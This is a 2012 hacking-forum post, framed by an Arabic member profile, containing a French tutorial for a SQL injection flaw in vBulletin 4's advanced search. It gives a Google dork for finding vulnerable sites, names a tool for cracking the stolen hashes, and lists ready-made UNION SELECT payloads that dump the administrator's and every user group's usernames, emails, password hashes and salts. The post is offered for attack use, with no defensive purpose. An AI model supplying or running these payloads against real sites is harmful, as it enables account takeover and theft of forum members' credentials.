05/02/2012, 01:44
|
المشاركة رقم: 1
|
| المعلومات |
| الكاتب: |
|
| اللقب: |
عضــــو جديــــد |
| الصورة الرمزية |
|
|
| البيانات |
| التسجيل : |
Feb 2012 |
| العضوية : |
3484 |
| الاهتمامات : |
|
| الإقامة : |
|
| المواضيع : |
1 |
| الردود : |
0 |
| المجموع : |
1 |
| بمعدل : |
0.00 يوميا |
| الاختراقات : |
[The UnKn0wN] |
| مجتمعنا : |
[The UnKn0wN] |
| الصنف : |
Gray Hat Hacker |
| آخر تواجد : |
18/08/2012/20:19 |
| سبب الغياب : |
حاظر |
| معدل التقييم: |
0 |
| نقاط التقييم: |
10 |
شكراً: 0
تم شكره مرة واحدة في مشاركة واحدة
| الإتصالات |
| الحالة: |
|
| وسائل الإتصال: |
|
|
vBulletin 4 SQL Injection Tutorial
Salutations,
je vous poste aujourd'hui la nouvelle faille découverte sur le puissant vBulletin.
La vulnérabilité touche les versions 4 de vBulletin . dans le module de la recherche avancée
l'exploitation de la faille ce fait grâce au cébèble plugin firefox (Live HTTP Headers)
Google dork : inurl:”search.php?search_type=1?
La faille nous permet d'avoir le username et le hash du mot de passe qu'on peux décrypter grâce au logiciel PasswordPro ( Téléchargement IcI) en utilisant l’algorithme
md5(md5($pass).$salt).
Requêtes utilisés pour l'extraction des idents :
كود:
Affiche le nom de la BDD :
&cat[0]=1) UNION SELECT database()#
Affiche la liste des tables :
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
Affiche les informations du l'Administrateur suprême (User, passe hash, email, salt) :
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#<
Affiche tout les admin :
&cat[0]=1) union+select+group_concat(username,0x3a,password,0x3a,salt) from user where usergroupid=6#
Affiche tout les super modo :
&cat[0]=1) union+select+group_concat(username,0x3a,password,0x3a,salt) from user where usergroupid=5#
Affiche tout les modos :
&cat[0]=1) union+select+group_concat(username,0x3a,password,0x3a,salt) from user where usergroupid=7#
Affiche les membres normaux :
&cat[0]=1) union+select+group_concat(username,0x3a,password,0x3a,salt) from user where usergroupid=2#
Enjoy
التعديل الأخير تم بواسطة ViRuS_Ra3cH ; 05/02/2012 الساعة 02:19
|
|
|